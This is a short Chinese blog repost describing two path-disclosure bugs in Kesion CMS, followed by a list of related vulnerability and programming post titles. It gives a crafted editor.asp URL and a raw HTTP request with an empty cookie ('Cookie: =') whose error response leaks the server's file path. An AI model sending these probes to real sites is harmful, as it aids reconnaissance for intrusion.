Kesion cms 路径泄露漏洞
来源:互联网 发布:淘宝店铺首页全屏装修 编辑:程序博客网 时间:2024/04/30 20:17
暴路径bug 1 :
http://www.xx .com/user/editor.asp?ChannelID=10000&ID=Content
----------------------------------------------------------------------------------------------
暴路径bug 2 :
最近看到一个科汛的cms(kesioncms)的奇怪漏洞,当提交网页时,将cookie字段设置为:=,则会爆出网站的路径,不知道这个是怎么回事,我对asp不熟悉,不做深入研究,留给有心人吧。下面附上数据包:
GET http://www.xxx.net/Item/Show.asp?m=1&d=1 HTTP/1.1
Host: www.xxx.net
Pragma: no-cache
Referer: http://www.xxx.net/Item/Show.asp?m=1&d=16
Connection: Keep-Alive
Cookie: =
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0)
HTTP/1.1 500 Internal Server Error
Date: Sat, 25 Jun 2011 22:23:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 193
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADARQSQ=EMLJEPBDMHAFNKKIFJFBIGJK; path=/
Cache-control: private
<font face=”宋体” size=2>错误 ‘80004005′</font>
<p>
<font face=”宋体” size=2>D:\WWWROOT\xxx\WWWROOT\ITEM\../KS_Cls/Kesion.CommonCls.asp</font><font face=”宋体” size=2>,行 3307</font>
- Kesion cms 路径泄露漏洞
- Kesion cms注入漏洞
- Drupal核心路径泄露漏洞
- PHP FirstPost存在路径泄露漏洞
- 科讯Kesion Cms7.0 任意文件下载漏洞
- phpMyAdmin phpmyadmin.css.php完全路径泄露漏洞
- phpMyAdmin phpmyadmin.css.php完全路径泄露漏洞
- ecshop的48个泄露网站路径漏洞
- cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)
- TRS CMS(拓尔思CMS) 漏洞集合
- photokorn 信息泄露漏洞
- 文件泄露漏洞
- 各大开源cms劲爆漏洞
- 骑士CMS SQL注入漏洞
- 齐博cms任意登陆漏洞
- 齐博cms老漏洞分析
- 齐博cms 7.0 漏洞分析
- cms系统资源路径引入
- 第二周 任务七 判断S所指的字符串是否回文
- 使用传输表空间跨平台迁移数据库
- Android应用启动时间调优
- 能ping通外网和局域网,却不能上网
- 再学 GDI+ GDI+ 的颜色常量表
- Kesion cms 路径泄露漏洞
- WEB相对路径绝对路径理解
- IOS开发中一些重要提示笔记
- 在c语言中写TMin
- java.lang.ClassCastException: android.view.ViewGroup$LayoutParams cannot be cast to android.widget.L
- 传智博客JAVA基础第一天
- asp中容错语句的使用
- 黑马程序员——封装ip地址的类InetAddress
- 12个有趣的C语言面试题